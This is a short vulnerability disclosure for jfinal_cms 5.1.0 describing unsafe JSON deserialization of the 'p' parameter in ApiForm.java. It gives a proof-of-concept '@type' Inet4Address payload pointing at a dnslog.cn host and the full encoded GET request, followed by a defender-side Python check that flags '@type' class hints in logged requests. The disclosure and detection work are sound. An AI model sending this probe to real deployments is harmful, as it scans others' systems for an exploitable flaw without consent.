jfinal_cms version: 5.1.0
JDK version: jdk-8u351
Vulnerable file: ApiForm.java
The p parameter is passed in from outside through the interface and is controllable by the caller, resulting in deserialization of untrusted input.
POC: content of the p parameter (URL encoding is required):
{"zeo":{"@type":"java.net.Inet4Address","val":"aporo8.dnslog.cn"}}
GET /api/action?version=1.0.1&apiNo=1000000&pageNo=1&pageSize=1&method=pageArticleSite&time=20170314160401&p=%7b%22%7a%65%6f%22%3a%7b%22%40%74%79%70%65%22%3a%22%6a%61%76%61%2e%6e%65%74%2e%49%6e%65%74%34%41%64%64%72%65%73%73%22%2c%22%76%61%6c%22%3a%22%61%70%6f%72%6f%38%2e%64%6e%73%6c%6f%67%2e%63%6e%22%7d%7d
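A defender-side check for the request shape above, as an added example (not code from jfinal_cms or from this report): it URL-decodes the p parameter of a logged request target and returns every "@type" class hint found in the JSON. The sample requests are constructed; the hostname and the siteId field are placeholders, and the function names are hypothetical.

```python
import json
from urllib.parse import parse_qs, quote, urlsplit

# Request path and fixed parameters as shown in the report; only p varies.
BASE = ("/api/action?version=1.0.1&apiNo=1000000&pageNo=1&pageSize=1"
        "&method=pageArticleSite&time=20170314160401&p=")

# Constructed sample request targets (placeholder hostname and field names).
SAMPLES = [
    BASE + quote('{"zeo":{"@type":"java.net.Inet4Address",'
                 '"val":"canary.example.invalid"}}', safe=""),
    BASE + quote('{"siteId":1}', safe=""),           # ordinary JSON, no class hint
    BASE + quote('{"@type":"x" broken', safe=""),    # malformed JSON carrying a hint
]


def type_hints_in_json(raw):
    """Return the values of every "@type" key in a JSON string.

    object_pairs_hook sees each object's raw key/value pairs, so nested
    objects and duplicate keys are both covered.
    """
    hits = []

    def hook(pairs):
        hits.extend(value for key, value in pairs if key == "@type")
        return dict(pairs)

    try:
        json.loads(raw, object_pairs_hook=hook)
    except ValueError:
        # A lenient server-side parser may accept what json.loads rejects,
        # so malformed input that still mentions "@type" is reported too.
        if "@type" in raw and not hits:
            hits.append("<unparsed>")
    return hits


def type_hints_in_request(request_target, param="p"):
    """URL-decode one query parameter of a request target and scan it."""
    query = urlsplit(request_target).query
    hits = []
    for raw in parse_qs(query, keep_blank_values=True).get(param, []):
        hits.extend(type_hints_in_json(raw))
    return hits


if __name__ == "__main__":
    for target in SAMPLES:
        print(type_hints_in_request(target))
```

Any non-empty result on a parameter that should carry plain data is worth an alert, since legitimate clients of this endpoint have no reason to name Java classes in p.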